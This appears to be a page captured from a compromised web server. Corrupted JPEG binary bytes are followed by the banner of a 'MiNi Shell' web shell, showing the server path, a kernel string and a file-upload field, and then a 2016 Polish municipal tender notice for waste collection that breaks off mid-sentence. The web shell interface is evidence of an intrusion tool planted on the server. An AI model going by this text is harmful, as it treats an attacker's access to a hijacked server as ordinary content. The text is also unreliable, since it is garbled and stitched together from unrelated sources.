JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161202/357283-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.gminagronowo.pl' target='_blank'>http://www.bip.gminagronowo.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 357283 - 2016
              z dnia 2016-12-02 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Gronowo Elbląskie: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Gronowo Elbląskie<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Gronowo Elbląskie, krajowy numer identyfikacyjny
              53442800000, ul.
              ul. Łączności 
              3,
              82335  
              Gronowo Elbląskie, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              552 315 623, e-mail
              e.zajac@gminagronowo.pl, faks
              552 315 623.
              <br />
              Adres strony internetowej (URL): www.bip.gminagronowo.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.gminagronowo.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.gminagronowo.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />forma pisemna w języku polskim<br />
                Adres:
                <br />Urząd Gminy Gronowo Elbląskie, pokój nr 11, ul. Łączności 3, 82-335 Gronowo Elbląskie, powia elbląskim, woj. warmińsko-mzurskie</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Gronowo Elbląskie<br /><b>Numer referencyjny: </b>ZRGo.ZP.271.216<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.Przedmiot zamówienia:
Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych z terenu Gminy Gronowo Elbląskie
2.Zakres zamówienia:
1)Odbieranie, transport i zagospodarowanie odpadów komunalnych zmieszanych (kod 200301) będzie się odbywało bezpośrednio od właścicieli nieruchomości zamieszkały w zabudowie jednorodzinnej i zagrodowej. Właściciel nieruchomości umożliwi Wykonawcy swobodny dostęp do pojemnika na odpady.  Jeżeli nieruchomość nie jest wyposażona w pojemniki do gromadzenia odpadów komunalnych zmieszanych lub odpadów pozostałych po segregacji Wykonawca na wniosek właściciela nieruchomości ma obowiązek takowy dostarczyć wówczas koszt pojemnika pokrywa właściciel nieruchomości bezpośrednio u Wykonawcy. Pojemniki muszą być szczelne, zamykane oraz zapewniać zebranie wszystkich odpadów z terenu nieruchomości w okresie między kolejnymi wywozami. Pojemniki do gromadzenia odpadów zmieszanych oraz odpadów pozostałych po segregacji ustala się o pojemności w dm3: 110, 120, 240. Częstotliwość wywozu przez Wykonawcę odpadów zmieszanych oraz odpadów pozostałych po segregacji  1 raz na tydzień. Jeżeli ustawienie pojemników do zbierania niesegregowanych (zmieszanych) odpadów komunalnych jest niemożliwe lub utrudnione, właściciele nieruchomości mogą, po uzgodnieniu z Wykonawcą, stosować do zbiórki tych odpadów worki o pojemności 120 dm3. Wykonawca zobowiązany jest do dostarczenia odebranych odpadów do RIPOK, tj. Zakładu Utylizacji Odpadów Sp. z o.o. w Elblągu, ul. Mazurska 42. Odbiór odpadów odbywać się będzie zgodnie z harmonogramem opracowanym przez Wykonawcę, zatwierdzonym przez Zamawiającego i podanym do ogólnej wiadomości, w tym również udostępniony na stronie internetowej Zamawiającego.
2)Odbieranie, transport i zagospodarowanie odpadów komunalnych zmieszanych (kod 200301) w terenie zabudowy wielorodzinnej odbywać się będzie poprzez ustawione pojemniki-kontenery we wskazanych miejscach zgodnie z załącznikiem nr 1 do SIWZ. Właściciel nieruchomości/zarządca umożliwi Wykonawcy swobodny dostęp do pojemników-kontenerów służących do gromadzenia odpadów komunalnych zmieszanych lub odpadów pozostałych po segregacji. Jeżeli nieruchomość nie jest wyposażona w pojemniki-kontenery do gromadzenia odpadów komunalnych zmieszanych  lub odpadów pozostałych po segregacji Wykonawca na wniosek właściciela nieruchomości/zarządcy ma obowiązek takowe dostarczyć - koszt wyposażenia nieruchomości w pojemniki-kontenery pokrywa właściciel nieruchomości/zarządca bezpośrednio u Wykonawcy. Pojemniki-kontenery muszą być szczelne, zamykane oraz zapewniać zebranie wszystkich odpadów z terenu nieruchomości w okresie między kolejnymi wywozami. Pojemniki do gromadzenia odpadów zmieszanych lub odpadów pozostałych po segregacji ustala się  o pojemności w dm3: 110, 120, 240 i 1100. Kontenery do gromadzenia odpadów ustala się  o pojemności: 5m3, 7m3, 10m3. Częstotliwość wywozu przez Wykonawcę odpadów zmieszanych oraz odpadów pozostałych po segregacji 1 raz na tydzień. W/w odpady przekazywane będą przez mieszkańców we własnym zakresie do wyznaczonych miejsc. Odbiór odpadów odbywać się będzie zgodnie z harmonogramem opracowanym przez Wykonawcę, zatwierdzonym przez Zamawiającego i podanym do ogólnej wiadomości, w tym również udostępniony na stronie internetowej Zamawiającego. Wykonawca zobowiązany jest do dostarczenia odebranych odpadów do RIPOK, tj. Zakładu Utylizacji Odpadów Sp. z o.o. w Elblągu, ul. Mazurska 42.  
3)Selektywne odbieranie i zagospodarowanie odpadów komunalnych z terenu gminy następujących frakcji odpadów tj.:
-papier i tektura, kod 200101, 150101
-szkła, opakowania ze szkła, kod 200102,150107
-metale, tworzywa sztuczne, opakowania wielomateriałowe kod 200140, 200139, 150104, 150102, 150105, 150106,
odbywać się będzie poprzez ustawienie co najmniej jednego zestawu składającego sięz trzech  pojemników (makulatura, tworzywo, szkło) we wskazanych miejscach zgodnie z załącznikiem nr 1 do SIWZ. Wykonawca w ramach zamówienia zobowiązany jest do dostarczenia i ustawienia w/w pojemników we wskazanych miejscach. Pojemniki do gromadzenia odpadów selektywnie zebranych ustala się o pojemności w dm3:  1100 oraz 2500, oznaczonych odpowiednio do każdej frakcji odpadów:
-kolor niebieski lub napis Makulatura - pojemniki przeznaczone do gromadzenia odpadów 
z papieru oraz makulatury, częstotliwość wywozu: 1 raz na miesiąc,
-kolor żółty lub napis Tworzywo  pojemnik przeznaczony do gromadzenia odpadów z tworzyw sztucznych, metali oraz opakowań wielomateriałowych, częstotliwość wywozu: 
1 raz w tygodniu,
-kolor zielony lub napis Szkło  pojemnik przeznaczony do gromadzenia odpadów ze szkła bezbarwnego oraz kolorowego, częstotliwość wywozu: 1 raz na dwa tygodnie.
Zamawiający zastrzega sobie możliwość zmiany ilości i wielkości pojemników oraz częstotliwość wywozu w/w odpadów komunalnych segregowanych. W/w odpady przekazywane będą przez mieszkańców we własnym zakresie do wyznaczonych miejsc. Odbiór odpadów odbywać się będzie zgodnie z harmonogramem opracowanym przez Wykonawcę, zatwierdzonym przez Zamawiającego i podanym do ogólnej wiadomości, w tym również udostępniony na stronie internetowej Zamawiającego. 
Dostarczenie i ustawienie w punktach selektywnej zbiórki pojemników na odpady BIO zgodnie z załącznikiem nr 1. Wykonawca zobowiązany jest do odbioru odpadów BIO jeden raz na trzy tygodnie, a w przypadku potrzeby na zgłoszenie. Pojemniki do gromadzenia odpadów BIO ustala się o pojemności nie mniejszej niż 120 dm3. (Nie dotyczy Wykonawców,  którzy w formularzu oferty nie zadeklarują tego zadania).
Wykonawca zobowiązany jest do odbioru, a następnie przekazania wszystkich odpadów selektywnie zebranych do RIPOK, tj. Zakładu Utylizacji Odpadów Sp. z o.o. w Elblągu,ul. Mazurska 42. 
4)Selektywne odbieranie i zagospodarowanie odpadów z terenu gminy frakcji  przeterminowane leki (kod 200131*, 200132) odbywać się będzie poprzez ustawienie pojemnika do gromadzenia odpadów we wskazanej aptece. Wykonawca zobowiązany jest do dostarczenia i ustawienia pojemnika we wskazanej aptece  VERBENA w Gronowie Elbląskim. Częstotliwość wywozu wg zgłoszenia do Wykonawcy. W/w odpady są przekazywane przez mieszkańców we własnym zakresie do wyznaczonego miejsca. Wykonawca zobowiązany jest do odbioru, a następnie przekazania odpadów do RIPOK, tj. Zakładu Utylizacji Odpadów Sp. z o.o. w Elblągu, ul. Mazurska 42.
5)Selektywne odbieranie i zagospodarowanie odpadów z terenu gminy frakcji:
-zużyty sprzęt elektryczny i elektroniczny kod 200121*, 200135, 200136, 200123*
-zużyte baterie i akumulatory kod 200133*, 200134
-odpady budowlane i rozbiórkowe kod 170101, 170102, 170103, 170107
-meble i inne odpady wielkogabarytowe kod 200307,
-zużyte opony 160103,
chemikalia w tym opakowania po chemikaliach kod 200113*, 200114*, 200115*, 200119*, 200127*, 200129*,
-odpady ulegające biodegradacji - zielone kod 200201,
-odpady kuchenne ulegające biodegradacji kod 200108, 
-papier i tektura kod 150101, 200101
-metal kod 150104, 200140,
-tworzywa sztuczne kod 150102, 170203, 200139,
-szkło i opakowania ze szkła kod 150107, 200102,
-opakowania wielomateriałowe kod 150105,
-odpady komunalne nie wymienione w innych podgrupach 200399
odbywać się będzie poprzez ustawione pojemniki-kontenery do gromadzenia odpadów w punkcje selektywnego zbierania odpadów komunalnych zlokalizowanym w Gronowie Elbląskim ul. Łączności 3 oraz Oleśno 48. Mieszkańcy zamieszkałych nieruchomości na terenie Gminy Gronowo Elbląskie będą mogli dostarczać nieodpłatnie i na własny koszt w/w frakcje odpadów do punktu. Wykonawca wyposaży punkt w niezbędną ilość urządzeń w tym pojemniki i kontenery umożliwiające prawidłowy odbiór i zagospodarowanie dostarczonych do niego odpadów w sposób zgodny z wymogami obowiązującego w tym zakresie prawa. Odbieranie odpadów komunalnych winno być na bieżąco, po zapełnieniu kontenerów-pojemników. Wykonawca zobowiązany jest do utworzenia punktu odbioru oraz przekazania wszystkich odpadów selektywnie zebranych do RIPOK, tj. Zakładu Utylizacji Odpadów Sp.z o.o. w Elblągu, ul. Mazurska 42. Zamawiający zapewni obsługę punktu, poprzez wyznaczenie miejsca do usytuowania pojemników-kontenerów, zamykanie i otwieranie punktu.
6)Ponadto Wykonawca jest zobowiązany do odbioru odpadów wielkogabarytowych 2 razy w ciągu trwania umowy w miesiącach kwiecień, wrzesień - bezpośrednio od mieszkańców. Odpady wielkogabarytowe będą wystawiane przez mieszkańców w systemie do krawężnika. Odbiór odpadów odbywać się będzie zgodnie z harmonogramem opracowanym przez Wykonawcę, zatwierdzonym przez Zamawiającego i podanym do ogólnej wiadomości, w tym również udostępniony na stronie internetowej Zamawiającego.
3.Wymagania dla pojazdów i urządzeń, którymi Wykonawca ma obowiązek realizować przedmiot zamówienia:
1)Wykonawca odbierający odpady komunalne przez cały okres realizacji zamówienia, zobowiązany jest dysponować pojazdami sprawnymi technicznie, zarejestrowanymi i dopuszczonymi do ruchu drogowego, przystosowanymi do odbierania: zmieszanych odpadów komunalnych, selektywnie zbieranych odpadów komunalnych, odpadów komunalnych gromadzonych w kontenerach.
2)W przypadku wystąpienia awarii pojazdów, Wykonawca ma obowiązek zapewnić pojazd zastępczy o tych samych parametrach.
3)Pojazdy przeznaczone do realizacji zamówienia winny być oznakowane w sposób czytelny i widoczny, umożliwiający łatwą identyfikację przedsiębiorcy poprzez umieszczenie na nich nazwy firmy, adresu i numeru telefonu.
4)Pojazdy muszą spełniać wymagania Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości(Dz. U. z 2013, poz. 122) w zakresie wyposażenia i wymagań technicznych umożliwiających odbieranie odpadów komunalnych od właścicieli nieruchomości oraz utrzymania odpowiedniego stanu sanitarnego pojazdów.
5)Zaplecze techniczne  baza magazynowo-transportowa. Wykonawca musi spełnić wymagania Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości(Dz. U.z 2013, poz. 122).
4.Obowiązki Wykonawcy w zakresie realizacji zamówienia:
1)Wykonawca zobowiązany jest do spełnienia przez cały okres wykonywania usług wszystkich wymogów wynikających z obowiązujących przepisów dotyczących odbierania i zagospodarowania odpadów komunalnych oraz zgodnie z wymaganiami określonymi 
w niniejszej specyfikacji istotnych warunków zamówienia.
2)Wykonawca zobowiązany jest przed podpisaniem umowy do posiadania wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości w Gminie Gronowo Elbląskie.
3)Wykonawca zobowiązany jest do posiadania ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzenia działalności na cały okres obowiązywania umowy.
4)Wykonawca zobowiązany jest do przekazania selektywnie zebranych odpadów komunalnych do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych (RIPOK), tj. Zakładu Utylizacji Odpadów Sp. z o.o.  w Elblągu, ul. Mazurska 42, zgodnie z zawartym Porozumieniem Międzygminnym z dnia 10.02.2010 r. oraz aneksem nr 1 z dnia 29.06.2015 r. 
5)Wykonawca zobowiązany jest podczas ważenia odpadów w Regionalnej Instalacji Przetwarzania Odpadów Komunalnych (RIPOK), tj. Zakładu Utylizacji Odpadów Sp. z o.o., w Elblągu, ul. Mazurska 42 do każdorazowego deklarowania rodzaju dostarczanych odpadów komunalnych i nazwy Gminy.
6)Wykonawca zobowiązany jest do sporządzania kart przekazania odpadów zgodnie z zaleceniem Regionalnej Instalacji Przetwarzania Odpadów Komunalnych(RIPOK), tj. Zakładu Utylizacji Odpadów Sp. z o.o. w Elblągu, ul. Mazurska 42.
7)Wykonawca będąc na terenie Zakładu Utylizacji Odpadów Sp. z o.o. w Elblągu, ul. Mazurska 42 zobowiązany jest do przestrzegania Regulaminu porządkowego Zakładu oraz dostosowania się do zaleceń pracowników Zakładu.
8)Wykonawca odbierający od właścicieli nieruchomości odpady komunalne zmieszane, odpady zielone oraz pozostałości z sortowania odpadów komunalnych, zobowiązany jest do ich przekazania do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych (RIPOK),                        tj. Zakładu Utylizacji Odpadów Sp. z o.o. w Elblągu, ul. Mazurska 42.
9)W przypadku, gdy Regionalna Instalacja Przetwarzania Odpadów Komunalnych(RIPOK) tj. Zakład Utylizacji Odpadów Sp. z o.o. w Elblągu, ul. Mazurska 42 ulegnie awarii lub z innych przyczyn nie będzie mogła przyjmować odpadów, Wykonawca jest zobowiązany w ramach obowiązującej ceny dostarczyć odpady do instalacji zastępczej.
10)Wykonawca na wniosek właściciela nieruchomości zobowiązany jest do umożliwienia  wynajmu, dzierżawy lub innej formy dysponowania pojemnikami do zbierania odpadów komunalnych zmieszanych lub odpadów pozostałych po segregacji w okresie obowiązywania umowy.
11)Wykonawca zobowiązany jest do dostarczenia i ustawienia w punktach selektywnej zbiórki pojemników na odpady BIO(między innymi odpady zielone, resztki żywności itp.) zgodnie z załącznikiem nr 1 do SIWZ. Częstotliwość wywozu odpadów BIO jeden raz na trzy tygodnie, a w przypadku potrzeby na zgłoszenie. Pojemniki do gromadzenia odpadów BIO ustala się o pojemności nie mniejszej niż 120 dm3. (Nie dotyczy Wykonawców, którzy     w formularzu oferty nie zadeklarują tego zadania).
12)Wykonawca zobowiązany jest do dostarczenia wszystkich pojemników do selektywnego zbierania odpadów w ramach wykonania niniejszego zamówienia.
13)Pojemniki stanowiące własność Wykonawcy winny być poddane dezynfekcji sześć razy w roku na zgłoszenie Zamawiającego. O dokonaniu tej czynności Wykonawca zobowiązany jest do przedłożenia Zamawiającemu informacji o jej  realizacji.
14)Wykonawca jest zobowiązany do odbioru odpadów wielkogabarytowych 2 razy w ciągu trwania umowy w miesiącach kwiecień, wrzesień - bezpośrednio od mieszkańców. Powyższe odpady będą wystawiane przez mieszkańców w systemie do krawężnika.
15)Zapewnienie, dla właściwej realizacji przedmiotu umowy, przez cały czas trwania umowy dostatecznej ilości środków technicznych, gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usługi, w ilości co najmniej takiej, jak w złożonej 
w postępowaniu przetargowym ofercie.
16)Porządkowanie terenu zanieczyszczonego odpadami i innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów i pojazdów w trakcie realizacji usługi wywozu.
17)Dokonywanie odbioru i transportu odpadów, również w przypadkach, kiedy dojazd do punktu zbiórki odpadów komunalnych będzie utrudniony z powodu prowadzonych remontów dróg, dojazdów itp.. W takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy.
18)Wykonawca zobowiązany jest sporządzić harmonogram wywozu odpadów komunalnych(w formie papierowej i elektronicznej), który dostarczy Zamawiającemu, a  Zamawiający umieści go na stronie internetowej urzędu. Wykonawca zobowiązany jest do przedstawienia harmonogramu wywozu Zamawiającemu na okres od dnia 01.01.2017r. do 31.12.2017 r. na 2 dni przed podpisaniem umowy. Odbiór odpadów komunalnych nie może odbywać się  w niedzielę i święta oraz  po godzinie 20:00. W przypadku, gdy dzień odbioru odpadów przypada na dzień świąteczny, dniem odbioru jest pierwszy kolejny dzień nie będący świętem lub niedzielą. 
19)Harmonogramy wywozu odpadów sporządzone przez Wykonawcę muszą uwzględniać stopień napełnienia pojemników/kontenerów, względów sanitarnych oraz potrzeb właścicieli nieruchomości.
20)Wszelkie zmiany harmonogramu wymagają formy pisemnej i akceptację Zamawiającego.
21)Wykonawca ponosi pełną odpowiedzialność za należyte wykonanie powierzonych czynności zgodnie z obowiązującymi przepisami prawa i normami.
22)Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy.
23)Wykonawca zobowiązany jest do przekazywania niezwłocznie informacji dotyczących realizacji umowy na każde żądanie Zamawiającego, nie później niż w ciągu dwóch dni roboczych od dnia otrzymania zapytania. 
24)Wykonawcę obowiązuje bezwzględny zakaz mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości oraz zakaz mieszania ze sobą poszczególnych frakcji selektywnie zebranych odpadów komunalnych.
25)Wykonawca ma obowiązek prowadzenia dokumentacji związanej z działalnością objętą zamówieniem, tj. sporządzanie półrocznych sprawozdań zawierających:
1.informacje o masie poszczególnych rodzajów odebranych odpadów komunalnych oraz sposobie ich zagospodarowania, wraz z  wskazaniem instalacji, do której zostały one przekazane,
2.informacje o masie odpadów komunalnych ulegających biodegradacji:
a)przekazywanych do składowania na składowiskach odpadów,
b)nie przekazanych do składowania na składowisku odpadów i sposobie ich zagospodarowania.
3.liczbę właścicieli nieruchomości, od których zostały odebrane odpady komunalne.
4.wskazanie właścicieli nieruchomości, którzy zbierają odpady komunalne w sposób niezgodny z regulaminem.
Sprawozdanie należy przekazać Zamawiającemu w terminie do końca miesiąca po półroczu, którego dotyczy. 
26)Wykonawca przedkłada Zamawiającemu w terminie składania pierwszego sprawozdania 
- wykaz wszystkich posesji, od których zostały odebrane odpady komunalne, wraz ze wskazaniem ilości i pojemności pojemników z jakich od nich odpady odebrano. W terminie kolejnych sprawozdań - wykaz posesji, które nie były zamieszczone we wcześniejszym wykazie, a odebrano z nich w okresie objętym sprawozdaniem odpady komunalne wraz 
